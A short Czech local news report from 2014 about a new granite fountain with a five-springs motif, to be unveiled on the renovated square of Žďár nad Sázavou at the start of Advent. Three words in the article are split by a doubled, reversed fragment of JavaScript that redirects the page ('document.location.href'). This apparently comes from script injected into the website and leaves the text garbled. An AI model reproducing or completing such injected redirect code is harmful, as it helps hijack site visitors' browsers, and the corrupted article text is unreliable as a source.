kašna
Rainbow page separator

Nová kašna se představí na začátku adventu

Pondělí, 27. října 2014

Kašna, Žďár nad Sázavou

Žďár nad Sázavou / První adventní neděli by se měla obyvatelům Žďáru na opraveném náměstí poprvé představit ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová desetitunová kašna z mrákotínské žuly s motivem symbolizujícím pět říčních pramenů. Ta vznikala v lomu poblíž Mrákotína u Telče od le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního jara, byla opracována z původně osmdesátitunového kusu kamene.
Na svém místě je žulová mísa o průměru čtyři metry už od konce září, poslední práce na ní kamenosochaři pod vedením hlavního au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tora kašny akademického sochaře Jiřího Plieštika prováděli přímo na místě. Šlo například o vyvrtání otvorů pro osmačtyřicet trysek po obvodu kašny. Vodaři ještě musí nainstalovat a vyzkoušet technologii a zakomponovat do kašny osvětlení, přičemž dělníci dodláždí okolí.